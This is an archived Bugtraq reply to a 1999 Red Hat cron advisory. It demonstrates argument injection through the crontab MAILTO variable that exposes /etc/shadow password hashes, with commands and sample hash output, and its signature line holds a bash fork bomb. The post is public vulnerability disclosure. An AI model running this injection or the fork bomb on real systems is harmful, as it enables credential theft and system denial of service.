Bugtraq mailing list archives
Re: [RHSA-1999:030-01] Buffer overflow in cron daemon
From: lcamtuf () IDS PL (Michal Zalewski)
Date: Mon, 5 Jul 1999 03:27:32 +0200
On Wed, 25 Aug 1999, Bill Nottingham wrote:
To the best of our knowledge, no known exploits exist at this time. Also, it was possible to use specially formatted 'MAILTO' environment variables to send commands to sendmail.
Oh, something from scratch:
[[lcamtuf@onehost lcamtuf]$ crontab -l
MAILTO='-bi -O AliasFile=/etc/shadow'
* * * * * nonexistent
[[lcamtuf@onehost lcamtuf]$ sleep 60
[[lcamtuf@onehost lcamtuf]$ strings -n 2 /etc/shadow.db|awk -F: '$2==""{print " - " $1 }$2!=""{printf $1}'|grep -v '*'
I15hybS.C.S1. - lcamtuf
hA/p45.MNqAtO - root
YoYwL/aBGnfAsRQ - testy
_______________________________________________________________________
Michal Zalewski [lcamtuf () ids pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
Current thread:
- [RHSA-1999:030-01] Buffer overflow in cron daemon Bill Nottingham (Aug 25)
- Re: [RHSA-1999:030-01] Buffer overflow in cron daemon Michal Zalewski (Jul 04)
- Re: [RHSA-1999:030-01] Buffer overflow in cron daemon Todd C. Miller (Aug 28)
- Re: [RHSA-1999:030-01] Buffer overflow in cron daemon Kurt Seifried (Aug 29)
- Re: [RHSA-1999:030-01] Buffer overflow in cron daemon Olaf Kirch (Aug 26)
- Re: [RHSA-1999:030-01] Buffer overflow in cron daemon Sam Carter (Aug 27)
- Re: [RHSA-1999:030-01] Buffer overflow in cron daemon Adam Morrison (Aug 29)
- <Possible follow-ups>
- Re: [RHSA-1999:030-01] Buffer overflow in cron daemon Todd C. Miller (Aug 28)
- Re: [RHSA-1999:030-01] Buffer overflow in cron daemon Michal Zalewski (Jul 04)